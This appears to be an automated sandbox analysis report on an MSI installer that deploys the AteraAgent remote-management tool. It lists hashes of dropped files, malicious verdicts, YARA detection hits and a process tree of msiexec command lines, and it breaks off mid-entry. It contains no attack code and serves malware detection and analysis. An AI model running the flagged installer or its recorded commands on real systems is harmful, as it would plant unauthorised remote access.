                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2551492331884888
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:e69u5th8FXz/T5idm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:d9RBTkm3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:1D2589CA75F98D7C99E00B483C9F6B67
                                                                                                                                                                                                                                                                                                                                  SHA1:79115956B2C206DE8C8ECBA56EBA54F6D51E8211
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0FC60527FE35549AFCAC0E62DB5744042BEB486E6AE4DB20F73F49BC2BEDF05
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9B75AEE923AB079E91B60754D5931C664E69C3410F41022FE4C33A1B5BFEE5B23BA280E0FBD3AB0FD9F7C7A66C41F552269565449825DA0A0E0BF50E47C4A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBAFD6533B3289355.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2803037319099166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:1hwu3th8FXzFT56RddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:vw3rTedWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:97FCD8DB13449BB7051CDBBC66340A8E
                                                                                                                                                                                                                                                                                                                                  SHA1:8BD72069DDC94AC7652D506AEBF9C1BC0902B9E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8411B750B766953310DD9514B4EF04C840DE7BF097669DBF777FE93D27C7563B
                                                                                                                                                                                                                                                                                                                                  SHA-512:92E1295FB946069A1FFA1E3D627B5C01651FAAEB00943A4CE0B21D651D8AA482CA472EB7B27B79FC9E287F4A3A4BEC6EF2B57CD7C71AD9CBCC2430A8EA95E6D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE942440AACDF3AD6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2551492331884888
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:e69u5th8FXz/T5idm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:d9RBTkm3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:1D2589CA75F98D7C99E00B483C9F6B67
                                                                                                                                                                                                                                                                                                                                  SHA1:79115956B2C206DE8C8ECBA56EBA54F6D51E8211
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0FC60527FE35549AFCAC0E62DB5744042BEB486E6AE4DB20F73F49BC2BEDF05
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9B75AEE923AB079E91B60754D5931C664E69C3410F41022FE4C33A1B5BFEE5B23BA280E0FBD3AB0FD9F7C7A66C41F552269565449825DA0A0E0BF50E47C4A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE999D03EF0B2A4AD.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5701014991086903
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:r8PhFuRc06WXz+FT5Sdm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:ShF1jFT8m3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:9E9CA92874801068799CF975C6C84F90
                                                                                                                                                                                                                                                                                                                                  SHA1:233CD27A9FE22100D0DBBBB47BD8970E30106962
                                                                                                                                                                                                                                                                                                                                  SHA-256:15C0CD0E4D28938F1EF82D1EF0F12BCE0175E53A1BA1F1B9F7CDEA661A143A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:83C5A56BE85A743CF3BB8DBEFFD889E900555CCA765FC9BFDAA53AE309BF3FB15A97812C1AC2832A37E6528288D1C23DEEEC5BFA1940F79A95960230AAA01091
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFECDCDF0BA996B022.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):172032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.4608669714804567
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:hIcuA5YHr6gsffcvSOxWX5WclJnJjC/cuA5YHr6gsffcvSOxWX5WclJnJjCL:h5dGHPssvS8cbdGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:0D7E1127A6517FE727FA2390D1763A8A
                                                                                                                                                                                                                                                                                                                                  SHA1:4EEC0864796D06B38F7F943DBC3E62452802C9AD
                                                                                                                                                                                                                                                                                                                                  SHA-256:70329C991A051B2A125494175C9999821B517B0C40E7DDC904472900000290F5
                                                                                                                                                                                                                                                                                                                                  SHA-512:ED081D0A2B7AAE0EA647B99C4D69871B88C333B3259D869BDF5DE7D2F97DEB0076E74017CD635BDC02B60193C22176571FB1F49AAAB41B7FA21443F6A38B280A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.14313291994698224
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:CnVubmStedGPdGeqISoedGPdGfonrhSpge9D:icyLInM5
                                                                                                                                                                                                                                                                                                                                  MD5:1B5B18AB704E112C47850FED95B6416D
                                                                                                                                                                                                                                                                                                                                  SHA1:92CC95057A0DD5B236F298D15900ADA4E9242E7B
                                                                                                                                                                                                                                                                                                                                  SHA-256:2BEE1743A1250BE914EF73508162988D38AD070777B58C002A0AF1F160955F04
                                                                                                                                                                                                                                                                                                                                  SHA-512:F8B0DA9D55F655A09856F349CE920324CE7FE22E9C8097589B5DFC588A579FD96195BBB4747C35C3C513B071799310B774197F42159104C07202E932CFD67C46
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFF7EC8F46D19662E2.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):326664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273611352763876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gpWGtJblMMuWntMAHeVQHe3lPpAyQ4L/8mJEDJnMihRD+ae7/lXCU:tGtJblMMuWntyxOyQ4LkIyxypCU
                                                                                                                                                                                                                                                                                                                                  MD5:D2A501F07C9F9373F11CC89FB2D49D8C
                                                                                                                                                                                                                                                                                                                                  SHA1:37EAADAF61D2CBE697F1C454640F9E04F4CD2D16
                                                                                                                                                                                                                                                                                                                                  SHA-256:A25A7C80A4BD007248306E02FBC10436885C64CC70A40433143BC82C641D3480
                                                                                                                                                                                                                                                                                                                                  SHA-512:B20727B34287D5877D94963B08F520E586C2A66A39631C768CF2F6ACA31959DFB2711C8043E71DA4FA8A00DF039E886D30B0D7DC2E85FEFC68E99761F3945B54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Cy:Cy
                                                                                                                                                                                                                                                                                                                                  MD5:17C47928D1BA7ECB789EE3E4E7BB61A4
                                                                                                                                                                                                                                                                                                                                  SHA1:58836A68D7DA82082C676A5E1F5BC33F2A8CADF0
                                                                                                                                                                                                                                                                                                                                  SHA-256:42A3ABE36D8E5C5CB6123D9DA9ADB152C87AD6E08CB6327BB5405A8E297635E4
                                                                                                                                                                                                                                                                                                                                  SHA-512:EF35FF11C834B9F6696C0EB1FA3F32A3DAE4C304AB872E2A5357D539DDA15C3AC7BD618B5AE8628BCF42BC9B47AFE0C6796816318B2E10B8378EDAFD953EE336
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:52..
                                                                                                                                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.878685496531656
                                                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                                                  • Microsoft Windows Installer (60509/1) 57.88%
                                                                                                                                                                                                                                                                                                                                  • ClickyMouse macro set (36024/1) 34.46%
                                                                                                                                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                                                                                                                                                                                                                                                                                                  File name:Arquivo_4593167.msi
                                                                                                                                                                                                                                                                                                                                  File size:2'994'176 bytes
                                                                                                                                                                                                                                                                                                                                  MD5:2ba70a300e16d1b51bd103de907777d8
                                                                                                                                                                                                                                                                                                                                  SHA1:9774343aeb3b6f06593fc84a59422ef3b8cce66b
                                                                                                                                                                                                                                                                                                                                  SHA256:0d47740bf97710835ebe91ac545ff0da45d81b54dfb8e2dea485fe5a123ae468
                                                                                                                                                                                                                                                                                                                                  SHA512:a2ba8694ea4d014e4103ed02d11ba7309d0ce0f290f55f0d671710cdf61f6d06d976531469686325965966a2d9cd5a0b3a69f47ca5b351b40da03ffaf15d47bb
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                                                                  TLSH:7CD523117584483AE37B0A358D7ADAA05E7DFE605B70CA8E9308741E2D705C1AB76FB3
                                                                                                                                                                                                                                                                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                                                                                                                                                                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Arquivo_4593167.msi"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c83f0000
                                                                                                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c83f0000
                                                                                                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:57
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x4e0000
                                                                                                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:57
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
